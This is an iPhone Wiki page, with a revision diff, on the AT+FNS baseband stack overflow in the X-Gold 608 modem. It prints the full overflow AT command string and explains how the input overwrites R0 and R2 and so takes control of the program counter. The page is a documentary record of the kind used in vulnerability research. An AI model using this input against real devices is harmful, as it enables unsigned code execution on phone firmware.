Difference between revisions of "AT+FNS"

From The iPhone Wiki
Jump to: navigation, search
(added the crash command)
m
 
(One intermediate revision by the same user not shown)
Line 18: Line 18:
 
Yet another buffer overflow in AT commands, like [[AT+XLOG Vulnerability|AT+XLOG]] and [[At+stkprof|AT+stkprof]]. Leaked by [[NitroKey]] who somehow intercepted the information and pastied it with hashes shortly after [[User:Oranav|Oranav]] had disclosed it to the [[iPhone Dev Team]].
 
Yet another buffer overflow in AT commands, like [[AT+XLOG Vulnerability|AT+XLOG]] and [[At+stkprof|AT+stkprof]]. Leaked by [[NitroKey]] who somehow intercepted the information and pastied it with hashes shortly after [[User:Oranav|Oranav]] had disclosed it to the [[iPhone Dev Team]].
   
  +
{{stub|exploit}}
 
[[Category:Baseband Exploits]]
 
[[Category:Baseband Exploits]]

Latest revision as of 21:00, 24 December 2012

Credit

Oranav

Exploit

There is a stack overflow in the AT+FNS=0,"..." command, which allows unsigned code execution on the X-Gold 608

AT+FNS="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000001111112222333344445555666677"

The exploit overwrites R0 and R2 on the stack, and R2 is copied to PC on exit from the routine. Therefore it can be used to overwrite R0 and PC.

Description

Yet another buffer overflow in AT commands, like AT+XLOG and AT+stkprof. Leaked by NitroKey who somehow intercepted the information and pastied it with hashes shortly after Oranav had disclosed it to the iPhone Dev Team.

Tango Utilities-terminal.png This exploit article is a "stub", an incomplete page. Please add more content to this article and remove this tag.